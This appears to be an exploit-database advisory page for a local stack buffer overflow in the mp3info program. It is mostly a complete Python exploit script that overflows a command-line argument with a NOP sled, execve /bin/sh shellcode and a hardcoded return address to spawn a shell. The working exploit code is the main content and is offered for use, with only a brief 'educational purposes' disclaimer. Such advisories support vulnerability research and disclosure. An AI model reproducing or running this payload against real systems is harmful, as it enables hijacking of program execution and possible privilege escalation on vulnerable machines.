Mp3info Stack Buffer Overflow

2014.01.28
Credit: jsacco
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Waste of CPU clock N2 # Exploit for: mp3info! Latest version # Author: jsacco - jsacco@exploitpack.com # Vendor: http://ibiblio.org/mp3info/ # No-one-cares-about programs! junk = "\x90\x90\x90\x90"*8 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" buffer = "\x90\x90\x90\x90"*89 eip = "\x10\xf0\xff\xbf" print "# MP3info is prone to a Stack-BoF" print "# Wasting CPU clocks on unusable exploits" print "# This is exploit is for educational purposes" try: subprocess.call(["mp3info", junk+shellcode+buffer+eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "MP3Info not found!" else: print "Error executing exploit" raise

References:

http://ibiblio.org/mp3info/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top